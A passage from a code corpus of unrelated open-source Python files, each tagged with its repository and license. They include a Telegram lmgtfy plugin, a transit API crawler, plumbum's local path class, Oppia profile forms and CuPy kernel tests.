r = types.InlineQueryResultArticle('1', "Please enter a query to lmgtfy it!", types.InputTextMessageContent('http://google.com'))
bot.answer_inline_query(query.id, [r])
return
text = query.query.replace("lmgtfy ", "")
lmgtfyurl = urllib.urlopen("http://r1z.ir/api.php?long=http://lmgtfy.com/?q={}".format(text.replace(" ", "+"))).read()
try:
r3 = types.InlineQueryResultArticle('3', "Send inline lmgtfy message!", types.InputTextMessageContent("Direct link: `{}`\n\nOr click on [this :D]({})".format(lmgtfyurl, lmgtfyurl), parse_mode="Markdown", disable_web_page_preview=True))
bot.answer_inline_query(query.id, [r3], cache_time=1, is_personal=True)
except:
r3 = types.InlineQueryResultArticle('3', 'Error occured.', types.InputTextMessageContent("Unexpected error occured."))
bot.answer_inline_query(query.id, [r3], cache_time=1, is_personal=True)
class pllmgtfy:
patterns = ["^[/!]lmgtfy(.*)$"]
inlines = ["lmgtfy(.*)"]
| WebShark025/ZigZag-v2 | plugins/lmgtfy.py | Python | mit | 1,560 |
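# Builds a settings file for a directory of images: every .jpg/.png found
# (optionally recursively) is paired with a .pts file of the same basename
# (assumed to exist), and one "image.ext image.pts" line per pair is written
# to <directory>/settings.txt or to --output_file.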
import os
import sys
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('directory', type=str)
parser.add_argument('--output_file', type=str, default=None)
parser.add_argument('--recursive', action='store_true')
args = parser.parse_args()
root_dir = args.directory
img_exts = ['.jpg', '.png']
img_paths = []
if args.recursive:
for subdir, dirs, files in os.walk(root_dir):
for file in files:
basename, ext = os.path.splitext(file)
img_path = os.path.join(subdir, file)
print img_path, ext
if ext in img_exts:
img_paths.append(img_path)
else:
for item in os.listdir(root_dir):
if os.path.isfile(os.path.join(root_dir, item)):
basename, ext = os.path.splitext(item)
img_path = os.path.join(root_dir, item)
print img_path, ext
if ext in img_exts:
img_paths.append(img_path)
print img_paths
pts_paths = []
for img_i in img_paths:
filename, ext = os.path.splitext(img_i)
pts_i = filename + '.pts'
pts_paths.append(filename + '.pts')
def get_file_name(fullpath):
path_name, filename = os.path.split(fullpath)
return filename
if args.output_file is None:
output_filename = args.directory + '/settings.txt'
else:
output_filename = args.output_file
with open(output_filename, 'w') as f:
[f.write(get_file_name(pi) + ' ' + get_file_name(pp) + '\n') for pi, pp in zip(img_paths, pts_paths)]
| phg1024/MultilinearReconstruction | create_setting_file.py | Python | mit | 1,493 |
from time import strftime
class API_efaBeta(object):
def __init__( self ):
self.name = 'efaBeta'
self.baseurl = 'https://www3.vvs.de/mngvvs/XML_DM_REQUEST'
def convert_station_id( self, station_id ):
"""
        Convert the given station id to the API-specific representation,
        if necessary.
@param station_id: id in general representation
@return id in api specific representation
"""
return station_id
def get_params( self, current_time_raw, station ):
"""
@param current_time_raw: time as gmtime object
@param station: station id in general representation
@return dict with key value pairs for api parameters
"""
itdDate = strftime("%Y%m%d", current_time_raw)
itdTime = strftime("%H%M", current_time_raw)
return {
'SpEncId' : 0,
'coordOutputFormat' : "EPSG:4326",
'deleteAssignedStops' : 1,
'itdDate' : itdDate,
'itdTime' : itdTime,
'limit' : 50,
'mode' : "direct",
'name_dm' : "de:8111:{}".format(self.convert_station_id(station)),
'outputFormat' : "rapidJSON",
'serverInfo' : "1",
'type_dm' : "any",
'useRealtime' : "1",
'version' : "10.2.2.48"
}
def function_to_call( self, results ):
"""
function that gets called on an api response
@param results: queue object of the api that contains result dicts from
the api call.
{
'timestamp': gmtime object -> when was the api call made
'name': api's name (id),
'station': station id,
'results': crawl results -> what came back from api
}
"""
results.put(None)
converted_results = []
for r in iter(results.get, None):
station = {}
current_dict = {}
station[r['station']] = [current_dict]
current_dict['timestamp'] = strftime('%Y-%m-%dT%H:%M:%SZ', r['timestamp']) # "2017-04-14 TEST"
current_dict['lines'] = {}
if not 'results' in r or not 'stopEvents' in r['results']:
continue
stop_events = filter(lambda elem:
elem['transportation']['product']['name']
== 'S-Bahn', r['results']['stopEvents'])
for st_event in stop_events:
departure_dict = {}
# print st_event
if 'isRealtimeControlled' in st_event:
departure_dict['isRealtimeControlled'] = st_event['isRealtimeControlled']
else:
departure_dict['isRealtimeControlled'] = False
if 'isRealtimeControlled' in departure_dict and 'departureTimeEstimated' in st_event:
departure_dict['departureTimeEstimated'] = st_event['departureTimeEstimated']
# else:
# departure_dict['departureTimeEstimated'] = None
departure_dict['departureTimePlanned'] = st_event['departureTimePlanned']
if 'infos' in st_event:
departure_dict['infos'] = []
for i in range(len(st_event['infos'])):
info = {}
if 'content' in st_event['infos'][i]:
info['content'] = st_event['infos'][i]['content']
else:
info['content'] = ""
info['title'] = st_event['infos'][i]['title']
info['subtitle'] = st_event['infos'][i]['subtitle']
info['properties'] = st_event['infos'][i]['properties']
departure_dict['infos'].append(info)
line = st_event['transportation']['number']
departure_dict['name'] = st_event['transportation']['product']['name']
departure_dict['class'] = st_event['transportation']['product']['class']
if line in current_dict['lines']:
current_dict['lines'][line].append(departure_dict)
else:
current_dict['lines'][line] = [departure_dict]
converted_results.append(station)
# print "Results: "
# with open("results.json", 'w') as output:
# json.dump(converted_results, output, indent=4)
# pprint(converted_results)
return converted_results
| jhertfe/vvs-delay | crawler/crawlerhelpers/efa_beta.py | Python | mit | 4,703 |
from django.core.management.base import BaseCommand
from danceschool.financial.helpers import (
createExpenseItemsForEvents, createExpenseItemsForVenueRental, createRevenueItemsForRegistrations
)
from danceschool.core.constants import getConstant
class Command(BaseCommand):
help = 'Create expense items for recurring expenses and generate revenue items for registrations'
def handle(self, *args, **options):
if getConstant('financial__autoGenerateExpensesEventStaff'):
self.stdout.write('Generating expense items for event staff...')
createExpenseItemsForEvents()
self.stdout.write('...done.')
else:
self.stdout.write('Generation of expense items for event staff is not enabled.')
if getConstant('financial__autoGenerateExpensesVenueRental'):
self.stdout.write('Generating expense items for venue rentals...')
createExpenseItemsForVenueRental()
self.stdout.write('...done.')
else:
self.stdout.write('Generation of expense items for venue rental is not enabled.')
if getConstant('financial__autoGenerateRevenueRegistrations'):
self.stdout.write('Generating revenue items for registrations...')
createRevenueItemsForRegistrations()
self.stdout.write('...done.')
else:
            self.stdout.write('Generation of revenue items for registrations is not enabled.')
| django-danceschool/django-danceschool | danceschool/financial/management/commands/create_financial_items.py | Python | bsd-3-clause | 1,459 |
import os
import sys
import glob
import shutil
import errno
import logging
from contextlib import contextmanager
from plumbum.lib import _setdoc, IS_WIN32
from plumbum.path.base import Path, FSUser
from plumbum.path.remote import RemotePath
try:
from pwd import getpwuid, getpwnam
from grp import getgrgid, getgrnam
except ImportError:
def getpwuid(x):
return (None,)
def getgrgid(x):
return (None,)
def getpwnam(x):
raise OSError("`getpwnam` not supported")
def getgrnam(x):
raise OSError("`getgrnam` not supported")
try: # Py3
import urllib.parse as urlparse
import urllib.request as urllib
except ImportError:
import urlparse
import urllib
logger = logging.getLogger("plumbum.local")
#===================================================================================================
# Local Paths
#===================================================================================================
class LocalPath(Path):
"""The class implementing local-machine paths"""
CASE_SENSITIVE = not IS_WIN32
def __new__(cls, *parts):
if len(parts) == 1 and \
isinstance(parts[0], cls) and \
not isinstance(parts[0], LocalWorkdir):
return parts[0]
if not parts:
            raise TypeError("At least one path part is required (none given)")
if any(isinstance(path, RemotePath) for path in parts):
raise TypeError("LocalPath cannot be constructed from %r" % (parts,))
self = super(LocalPath, cls).__new__(cls, os.path.normpath(os.path.join(*(str(p) for p in parts))))
return self
@property
def _path(self):
return str(self)
def _get_info(self):
return self._path
def __getstate__(self):
return {"_path" : self._path}
def _form(self, *parts):
return LocalPath(*parts)
@property
@_setdoc(Path)
def name(self):
return os.path.basename(str(self))
@property
@_setdoc(Path)
def dirname(self):
return LocalPath(os.path.dirname(str(self)))
@property
@_setdoc(Path)
def suffix(self):
return os.path.splitext(str(self))[1]
@property
def suffixes(self):
exts = []
base = str(self)
while True:
base, ext = os.path.splitext(base)
if ext:
exts.append(ext)
else:
return list(reversed(exts))
@property
@_setdoc(Path)
def uid(self):
uid = self.stat().st_uid
name = getpwuid(uid)[0]
return FSUser(uid, name)
@property
@_setdoc(Path)
def gid(self):
gid = self.stat().st_gid
name = getgrgid(gid)[0]
return FSUser(gid, name)
@_setdoc(Path)
def join(self, *others):
return LocalPath(self, *others)
@_setdoc(Path)
def list(self):
return [self / fn for fn in os.listdir(str(self))]
@_setdoc(Path)
def iterdir(self):
try:
return (self.__class__(fn.name) for fn in os.scandir(str(self)))
except NameError:
return (self / fn for fn in os.listdir(str(self)))
@_setdoc(Path)
def is_dir(self):
return os.path.isdir(str(self))
@_setdoc(Path)
def is_file(self):
return os.path.isfile(str(self))
@_setdoc(Path)
def is_symlink(self):
return os.path.islink(str(self))
@_setdoc(Path)
def exists(self):
return os.path.exists(str(self))
@_setdoc(Path)
def stat(self):
return os.stat(str(self))
@_setdoc(Path)
def with_name(self, name):
return LocalPath(self.dirname) / name
@property
@_setdoc(Path)
def stem(self):
return self.name.rsplit(os.path.extsep)[0]
@_setdoc(Path)
def with_suffix(self, suffix, depth=1):
if (suffix and not suffix.startswith(os.path.extsep) or suffix == os.path.extsep):
raise ValueError("Invalid suffix %r" % (suffix))
name = self.name
depth = len(self.suffixes) if depth is None else min(depth, len(self.suffixes))
for i in range(depth):
name, ext = os.path.splitext(name)
return LocalPath(self.dirname) / (name + suffix)
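    # For example, given the logic above:
    #   LocalPath('a/b.tar.gz').with_suffix('.bz2')             -> a/b.tar.bz2
    #   LocalPath('a/b.tar.gz').with_suffix('.bz2', depth=None) -> a/b.bz2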
@_setdoc(Path)
def glob(self, pattern):
fn = lambda pat: [LocalPath(m) for m in glob.glob(str(self / pat))]
return self._glob(pattern, fn)
@_setdoc(Path)
def delete(self):
if not self.exists():
return
if self.is_dir():
shutil.rmtree(str(self))
else:
try:
os.remove(str(self))
except OSError:
# file might already been removed (a race with other threads/processes)
_, ex, _ = sys.exc_info()
if ex.errno != errno.ENOENT:
raise
@_setdoc(Path)
def move(self, dst):
if isinstance(dst, RemotePath):
raise TypeError("Cannot move local path %s to %r" % (self, dst))
shutil.move(str(self), str(dst))
return LocalPath(dst)
@_setdoc(Path)
def copy(self, dst, override = False):
if isinstance(dst, RemotePath):
raise TypeError("Cannot copy local path %s to %r" % (self, dst))
dst = LocalPath(dst)
if override:
dst.delete()
if self.is_dir():
shutil.copytree(str(self), str(dst))
else:
dst_dir = LocalPath(dst).dirname
if not dst_dir.exists():
dst_dir.mkdir()
shutil.copy2(str(self), str(dst))
return dst
@_setdoc(Path)
def mkdir(self):
if not self.exists():
try:
os.makedirs(str(self))
except OSError:
# directory might already exist (a race with other threads/processes)
_, ex, _ = sys.exc_info()
if ex.errno != errno.EEXIST:
raise
@_setdoc(Path)
def open(self, mode = "rb"):
return open(str(self), mode)
@_setdoc(Path)
def read(self, encoding=None):
with self.open("rb") as f:
data = f.read()
if encoding:
data = data.decode(encoding)
return data
@_setdoc(Path)
def write(self, data, encoding=None):
if encoding:
data = data.encode(encoding)
with self.open("wb") as f:
f.write(data)
@_setdoc(Path)
def chown(self, owner = None, group = None, recursive = None):
if not hasattr(os, "chown"):
raise OSError("os.chown() not supported")
uid = self.uid if owner is None else (owner if isinstance(owner, int) else getpwnam(owner)[2])
gid = self.gid if group is None else (group if isinstance(group, int) else getgrnam(group)[2])
os.chown(str(self), uid, gid)
if recursive or (recursive is None and self.is_dir()):
for subpath in self.walk():
os.chown(str(subpath), uid, gid)
@_setdoc(Path)
def chmod(self, mode):
if not hasattr(os, "chmod"):
raise OSError("os.chmod() not supported")
os.chmod(str(self), mode)
@_setdoc(Path)
def access(self, mode = 0):
return os.access(str(self), self._access_mode_to_flags(mode))
@_setdoc(Path)
def link(self, dst):
if isinstance(dst, RemotePath):
raise TypeError("Cannot create a hardlink from local path %s to %r" % (self, dst))
if hasattr(os, "link"):
os.link(str(self), str(dst))
else:
from plumbum.machines.local import local
# windows: use mklink
if self.is_dir():
local["cmd"]("/C", "mklink", "/D", "/H", str(dst), str(self))
else:
local["cmd"]("/C", "mklink", "/H", str(dst), str(self))
@_setdoc(Path)
def symlink(self, dst):
if isinstance(dst, RemotePath):
raise TypeError("Cannot create a symlink from local path %s to %r" % (self, dst))
if hasattr(os, "symlink"):
os.symlink(str(self), str(dst))
else:
from plumbum.machines.local import local
# windows: use mklink
if self.is_dir():
local["cmd"]("/C", "mklink", "/D", str(dst), str(self))
else:
local["cmd"]("/C", "mklink", str(dst), str(self))
@_setdoc(Path)
def unlink(self):
try:
if hasattr(os, "symlink") or not self.is_dir():
os.unlink(str(self))
else:
# windows: use rmdir for directories and directory symlinks
os.rmdir(str(self))
except OSError:
# file might already been removed (a race with other threads/processes)
_, ex, _ = sys.exc_info()
if ex.errno != errno.ENOENT:
raise
@_setdoc(Path)
def truncate(self, size):
with self.open("r+b") as f:
os.ftruncate(f.fileno(), size)
@_setdoc(Path)
def as_uri(self, scheme='file'):
return urlparse.urljoin(str(scheme)+':', urllib.pathname2url(str(self)))
@property
@_setdoc(Path)
def drive(self):
return os.path.splitdrive(str(self))[0]
@property
@_setdoc(Path)
def root(self):
return os.path.sep
class LocalWorkdir(LocalPath):
"""Working directory manipulator"""
def __hash__(self):
raise TypeError("unhashable type")
def __new__(cls):
return super(LocalWorkdir, cls).__new__(cls, os.getcwd())
def chdir(self, newdir):
"""Changes the current working directory to the given one
:param newdir: The destination director (a string or a ``LocalPath``)
"""
if isinstance(newdir, RemotePath):
raise TypeError("newdir cannot be %r" % (newdir,))
logger.debug("Chdir to %s", newdir)
os.chdir(str(newdir))
return self.__class__()
def getpath(self):
"""Returns the current working directory as a ``LocalPath`` object"""
return LocalPath(self._path)
@contextmanager
def __call__(self, newdir):
"""A context manager used to ``chdir`` into a directory and then ``chdir`` back to
the previous location; much like ``pushd``/``popd``.
        :param newdir: The destination directory (a string or a ``LocalPath``)
"""
prev = self._path
newdir = self.chdir(newdir)
try:
yield newdir
finally:
self.chdir(prev)
| weka-io/plumbum | plumbum/path/local.py | Python | mit | 10,605 |
# coding=utf-8
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os
import django.utils.translation.trans_real
from . import parser
class TranslationsLoader(object):
def __init__(self, locale_paths=(), locales=()):
self.locale_paths = locale_paths
self.locales = locales
super(TranslationsLoader, self).__init__()
def execute(self):
for locale in self.locales:
language = django.utils.translation.trans_real.to_language(locale)
# XXX: this will trigger useless loading of translations from django code
catalog = django.utils.translation.trans_real.translation(language)._catalog
catalog.clear()
for file_path in self._get_translation_files(locale):
catalog.update(parser.parse_po_filename(file_path))
def list_files(self):
for locale in self.locales:
for file_path in self._get_translation_files(locale):
yield file_path
def _get_translation_files(self, locale):
for locale_path in self.locale_paths:
translation_path = os.path.join(locale_path, locale, 'LC_MESSAGES/django.po')
if os.path.isfile(translation_path):
yield translation_path
| kmichel/po-localization | po_localization/translations_loader.py | Python | mit | 1,328 |
# -*- encoding: utf-8 -*-
def zip_sequences(sequences, cyclic=False, truncate=True):
r'''Zips `sequences`.
.. container:: example
Zips two `sequences` cyclically:
::
>>> sequences = [[1, 2, 3], ['a', 'b']]
>>> sequencetools.zip_sequences(sequences, cyclic=True)
[(1, 'a'), (2, 'b'), (3, 'a')]
.. container:: example
Zips three `sequences` cyclically:
::
>>> sequences = [[10, 11, 12], [20, 21], [30, 31, 32, 33]]
>>> sequencetools.zip_sequences(sequences, cyclic=True)
[(10, 20, 30), (11, 21, 31), (12, 20, 32), (10, 21, 33)]
.. container:: example
Zips sequences without truncation:
::
>>> sequences = ([1, 2, 3, 4], [11, 12, 13], [21, 22, 23])
>>> sequencetools.zip_sequences(sequences, truncate=False)
[(1, 11, 21), (2, 12, 22), (3, 13, 23), (4,)]
.. container:: example
Zips sequences noncyclically and with truncation.
Equivalent to built-in ``zip()``:
::
>>> sequences = ([1, 2, 3, 4], [11, 12, 13], [21, 22, 23])
>>> sequencetools.zip_sequences(sequences)
[(1, 11, 21), (2, 12, 22), (3, 13, 23)]
Returns list.
'''
if cyclic:
result = []
if not min(len(x) for x in sequences):
return result
max_length = max([len(x) for x in sequences])
for i in range(max_length):
part = []
for sequence in sequences:
index = i % len(sequence)
element = sequence[index]
part.append(element)
part = tuple(part)
result.append(part)
elif not truncate:
result = []
max_length = max([len(x) for x in sequences])
for i in range(max_length):
part = []
for sequence in sequences:
try:
part.append(sequence[i])
except IndexError:
pass
result.append(tuple(part))
elif truncate:
result = list(zip(*sequences))
return result | mscuthbert/abjad | abjad/tools/sequencetools/zip_sequences.py | Python | gpl-3.0 | 2,167 |
# oppia/profile/forms.py
import hashlib
import urllib
from django import forms
from django.conf import settings
from django.contrib.auth import (authenticate, login, views)
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.contrib.auth.models import User
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Button, Layout, Fieldset, ButtonHolder, Submit, Div, HTML
class LoginForm(forms.Form):
username = forms.CharField(max_length=30,
error_messages={'required': _(u'Please enter a username.')},)
password = forms.CharField(widget=forms.PasswordInput,
error_messages={'required': _(u'Please enter a password.'),},
required=True)
next = forms.CharField(widget=forms.HiddenInput())
def __init__(self, *args, **kwargs):
super(LoginForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_action = reverse('profile_login')
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
self.helper.layout = Layout(
'username',
'password',
'next',
Div(
Submit('submit', _(u'Login'), css_class='btn btn-default'),
HTML("""<a class="btn btn-default" href="{% url 'profile_reset' %}">"""+_(u'Forgotten password?') + """</a>"""),
css_class='col-lg-offset-2 col-lg-4',
),
)
def clean(self):
cleaned_data = self.cleaned_data
username = cleaned_data.get("username")
password = cleaned_data.get("password")
user = authenticate(username=username, password=password)
if user is None or not user.is_active:
raise forms.ValidationError( _(u"Invalid username or password. Please try again."))
return cleaned_data
class RegisterForm(forms.Form):
username = forms.CharField(max_length=30,
min_length=4,
error_messages={'required': _(u'Please enter a username.')},)
email = forms.CharField(validators=[validate_email],
error_messages={'invalid': _(u'Please enter a valid e-mail address.'),
'required': _(u'Please enter your e-mail address.')},
required=True)
password = forms.CharField(widget=forms.PasswordInput,
error_messages={'required': _(u'Please enter a password.'),
'min_length': _(u'Your password should be at least 6 characters long.')},
min_length=6,
required=True)
password_again = forms.CharField(widget=forms.PasswordInput,
min_length=6,
error_messages={'required': _(u'Please enter your password again.'),
'min_length': _(u'Your password again should be at least 6 characters long.')},
required=True)
first_name = forms.CharField(max_length=100,
error_messages={'required': _(u'Please enter your first name.'),
'min_length': _(u'Your first name should be at least 2 characters long.')},
min_length=2,
required=True)
last_name = forms.CharField(max_length=100,
error_messages={'required': _(u'Please enter your last name.'),
'min_length': _(u'Your last name should be at least 2 characters long.')},
min_length=2,
required=True)
job_title = forms.CharField(max_length=100,required=False)
organisation = forms.CharField(max_length=100,required=False)
def __init__(self, *args, **kwargs):
super(RegisterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_action = reverse('profile_register')
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
self.helper.layout = Layout(
'username',
'email',
'password',
'password_again',
'first_name',
'last_name',
'job_title',
'organisation',
Div(
Submit('submit', _(u'Register'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
def clean(self):
cleaned_data = self.cleaned_data
email = cleaned_data.get("email")
password = cleaned_data.get("password")
password_again = cleaned_data.get("password_again")
username = cleaned_data.get("username")
# check the username not already used
num_rows = User.objects.filter(username=username).count()
if num_rows != 0:
raise forms.ValidationError( _(u"Username has already been registered, please select another."))
# check the email address not already used
num_rows = User.objects.filter(email=email).count()
if num_rows != 0:
raise forms.ValidationError( _(u"Email has already been registered"))
# check the password are the same
if password and password_again:
if password != password_again:
raise forms.ValidationError( _(u"Passwords do not match."))
# Always return the full collection of cleaned data.
return cleaned_data
class ResetForm(forms.Form):
username = forms.CharField(max_length=30,
error_messages={'invalid': _(u'Please enter a username or email address.')},
required=True)
def __init__(self, *args, **kwargs):
super(ResetForm, self).__init__(*args, **kwargs)
self.fields['username'].label = "Username or email"
self.helper = FormHelper()
self.helper.form_action = reverse('profile_reset')
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
self.helper.layout = Layout(
'username',
Div(
Submit('submit', _(u'Reset password'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
def clean(self):
cleaned_data = self.cleaned_data
username = cleaned_data.get("username")
try:
user = User.objects.get(username__exact=username)
except User.DoesNotExist:
try:
user = User.objects.get(email__exact=username)
except User.DoesNotExist:
raise forms.ValidationError( _(u"Username/email not found"))
return cleaned_data
class ProfileForm(forms.Form):
api_key = forms.CharField(widget = forms.TextInput(attrs={'readonly':'readonly'}),
required=False, help_text=_(u'You cannot edit the API Key.'))
username = forms.CharField(widget = forms.TextInput(attrs={'readonly':'readonly'}),
required=False, help_text=_(u'You cannot edit the username.'))
email = forms.CharField(validators=[validate_email],
error_messages={'invalid': _(u'Please enter a valid e-mail address.')},
required=True)
password = forms.CharField(widget=forms.PasswordInput,
required=False,
min_length=6,
error_messages={'min_length': _(u'The new password should be at least 6 characters long')},)
password_again = forms.CharField(widget=forms.PasswordInput,
required=False,
min_length=6)
first_name = forms.CharField(max_length=100,
min_length=2,
required=True)
last_name = forms.CharField(max_length=100,
min_length=2,
required=True)
job_title = forms.CharField(max_length=100,required=False)
organisation = forms.CharField(max_length=100,required=False)
def __init__(self, *args, **kwargs):
super(ProfileForm, self).__init__(*args, **kwargs)
if len(args) == 1:
email = args[0]['email']
username = args[0]['username']
else:
kw = kwargs.pop('initial')
email = kw['email']
username = kw['username']
self.helper = FormHelper()
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
if settings.OPPIA_SHOW_GRAVATARS:
gravatar_url = "https://www.gravatar.com/avatar.php?"
gravatar_url += urllib.urlencode({
'gravatar_id':hashlib.md5(email).hexdigest(),
'size':64
})
self.helper.layout = Layout(
Div(
HTML("""<label class="control-label col-lg-2">"""+_(u'Photo') + """</label>"""),
Div(
HTML(mark_safe('<img src="{0}" alt="gravatar for {1}" class="gravatar" width="{2}" height="{2}"/>'.format(gravatar_url, username, 64))),
HTML("""<br/>"""),
HTML("""<a href="https://www.gravatar.com">"""+_(u'Update gravatar')+"""</a>"""),
css_class="col-lg-4",
),
css_class="form-group",
),
'api_key',
'username',
'email',
'first_name',
'last_name',
'job_title',
'organisation',
Div(
HTML("""<h3>"""+_(u'Change password') + """</h3>"""),
),
'password',
'password_again',
Div(
Submit('submit', _(u'Save'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
else:
self.helper.layout = Layout(
'api_key',
'username',
'email',
'first_name',
'last_name',
Div(
HTML("""<h3>"""+_(u'Change password') + """</h3>"""),
),
'password',
'password_again',
Div(
Submit('submit', _(u'Save'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
def clean(self):
cleaned_data = self.cleaned_data
# check email not used by anyone else
email = cleaned_data.get("email")
username = cleaned_data.get("username")
num_rows = User.objects.exclude(username__exact=username).filter(email=email).count()
if num_rows != 0:
raise forms.ValidationError( _(u"Email address already in use"))
# if password entered then check they are the same
password = cleaned_data.get("password")
password_again = cleaned_data.get("password_again")
if password and password_again:
if password != password_again:
raise forms.ValidationError( _(u"Passwords do not match."))
return cleaned_data
class UploadProfileForm(forms.Form):
upload_file = forms.FileField(
required=True,
error_messages={'required': _('Please select a file to upload')},)
def __init__(self, *args, **kwargs):
super(UploadProfileForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_action = reverse('profile_upload')
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
self.helper.layout = Layout(
'upload_file',
Div(
Submit('submit', _(u'Upload'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
| DigitalCampus/django-instrat-oppia | oppia/profile/forms.py | Python | gpl-3.0 | 13,649 |
import pytest
import watchmaker
@pytest.fixture
def setup_object():
pass
def test_main():
"""Placeholder for tests"""
# Placeholder
assert watchmaker.__version__ == watchmaker.__version__
| MarionTheBull/watchmaker | tests/test_watchmaker.py | Python | apache-2.0 | 209 |
import unittest
import numpy
import pytest
import cupy
from cupy import testing
from cupy.cuda import runtime
from cupy.cuda.texture import (ChannelFormatDescriptor, CUDAarray,
ResourceDescriptor, TextureDescriptor,
TextureObject,)
class TestUserkernel(unittest.TestCase):
def test_manual_indexing(self, n=100):
in1 = cupy.random.uniform(-1, 1, n).astype(cupy.float32)
in2 = cupy.random.uniform(-1, 1, n).astype(cupy.float32)
uesr_kernel_1 = cupy.ElementwiseKernel(
'T x, T y',
'T z',
'''
z = x + y;
''',
'uesr_kernel_1')
out1 = uesr_kernel_1(in1, in2)
uesr_kernel_2 = cupy.ElementwiseKernel(
'raw T x, raw T y',
'raw T z',
'''
z[i] = x[i] + y[i];
''',
'uesr_kernel_2')
out2 = uesr_kernel_2(in1, in2, size=n)
testing.assert_array_equal(out1, out2)
def test_python_scalar(self):
for typ in (int, float, bool):
dtype = numpy.dtype(typ).type
in1_cpu = numpy.random.randint(0, 1, (4, 5)).astype(dtype)
in1 = cupy.array(in1_cpu)
scalar_value = typ(2)
uesr_kernel_1 = cupy.ElementwiseKernel(
'T x, T y',
'T z',
'''
z = x + y;
''',
'uesr_kernel_1')
out1 = uesr_kernel_1(in1, scalar_value)
expected = in1_cpu + dtype(2)
testing.assert_array_equal(out1, expected)
@testing.for_all_dtypes()
def test_numpy_scalar(self, dtype):
in1_cpu = numpy.random.randint(0, 1, (4, 5)).astype(dtype)
in1 = cupy.array(in1_cpu)
scalar_value = dtype(2)
uesr_kernel_1 = cupy.ElementwiseKernel(
'T x, T y',
'T z',
'''
z = x + y;
''',
'uesr_kernel_1')
out1 = uesr_kernel_1(in1, scalar_value)
expected = in1_cpu + dtype(2)
testing.assert_array_equal(out1, expected)
class TestElementwiseKernelSize(unittest.TestCase):
# Tests to check whether size argument raises ValueError correctly
# depending on the raw specifiers of a user kernel.
def setUp(self):
self.arr1 = cupy.array([1, 2], dtype='float32')
self.arr2 = cupy.array([3, 4], dtype='float32')
def raises_size_not_allowed(self):
return pytest.raises(ValueError, match=r'^Specified \'size\' can')
def raises_size_required(self):
return pytest.raises(ValueError, match=r'^Loop size is undecided\.')
def create_kernel(self, input_raw, output_raw):
# Creates a no-op kernel with given parameter specification.
# input_raw and output_raw are tuples of True/False whose
# corresponding parameter will be designated as 'raw' if True.
input_types = (
', '.join([
'{}float32 x{}'.format(
('raw ' if raw else ''), i)
for i, raw in enumerate(input_raw)]))
output_types = (
', '.join([
'{}float32 y{}'.format(
('raw ' if raw else ''), i)
for i, raw in enumerate(output_raw)]))
return cupy.ElementwiseKernel(input_types, output_types, '', 'kernel')
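    # For example, create_kernel((True, False), (False,)) produces parameter
    # lists 'raw float32 x0, float32 x1' and 'float32 y0'.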
def test_all_raws(self):
# Input arrays are all raw -> size required
kernel1 = self.create_kernel((True, True), (False,))
kernel1(self.arr1, self.arr2, size=2)
with self.raises_size_required():
kernel1(self.arr1, self.arr2)
kernel2 = self.create_kernel((True, True), (True,))
kernel2(self.arr1, self.arr2, size=2)
with self.raises_size_required():
kernel2(self.arr1, self.arr2)
def test_all_nonraws(self):
# All arrays are not raw -> size not allowed
kernel1 = self.create_kernel((False, False), (False,))
with self.raises_size_not_allowed():
kernel1(self.arr1, self.arr2, size=2)
kernel2 = self.create_kernel((False, False), (True,))
with self.raises_size_not_allowed():
kernel2(self.arr1, self.arr2, size=2)
def test_some_nonraws(self):
# Some arrays are not raw -> size not allowed
kernel1 = self.create_kernel((True, False), (False,))
with self.raises_size_not_allowed():
kernel1(self.arr1, self.arr2, size=2)
kernel2 = self.create_kernel((False, True), (False,))
with self.raises_size_not_allowed():
kernel2(self.arr1, self.arr2, size=2)
kernel3 = self.create_kernel((True, False), (True,))
with self.raises_size_not_allowed():
kernel3(self.arr1, self.arr2, size=2)
kernel4 = self.create_kernel((False, True), (True,))
with self.raises_size_not_allowed():
kernel4(self.arr1, self.arr2, size=2)
def test_scalars_and_nonraws(self):
# Combination of scalars and non-raw arrays -> size not allowed
kernel1 = self.create_kernel((False, False), (False,))
with self.raises_size_not_allowed():
kernel1(self.arr1, 7, size=2)
kernel2 = self.create_kernel((False, False), (False,))
with self.raises_size_not_allowed():
kernel2(7, self.arr1, size=2)
kernel3 = self.create_kernel((False, False), (True,))
with self.raises_size_not_allowed():
kernel3(self.arr1, 7, size=2)
kernel4 = self.create_kernel((False, False), (True,))
with self.raises_size_not_allowed():
kernel4(7, self.arr1, size=2)
def test_scalars_and_raws_and_nonraws(self):
# Combination of scalars and raw arrays and non-raw arrays
# -> size not allowed
kernel1 = self.create_kernel((False, False, True), (False,))
with self.raises_size_not_allowed():
kernel1(self.arr1, 7, self.arr2, size=2)
kernel2 = self.create_kernel((False, False, True), (True,))
with self.raises_size_not_allowed():
kernel2(self.arr1, 7, self.arr2, size=2)
def test_scalars_and_raws(self):
# Combination of scalars and raw arrays -> size required
kernel1 = self.create_kernel((True, False), (False,))
kernel1(self.arr1, 7, size=2)
with self.raises_size_required():
kernel1(self.arr1, 7)
kernel2 = self.create_kernel((False, True), (False,))
kernel2(7, self.arr1, size=2)
with self.raises_size_required():
kernel2(7, self.arr1)
kernel3 = self.create_kernel((True, False), (True,))
kernel3(self.arr1, 7, size=2)
with self.raises_size_required():
kernel3(self.arr1, 7)
kernel4 = self.create_kernel((False, True), (True,))
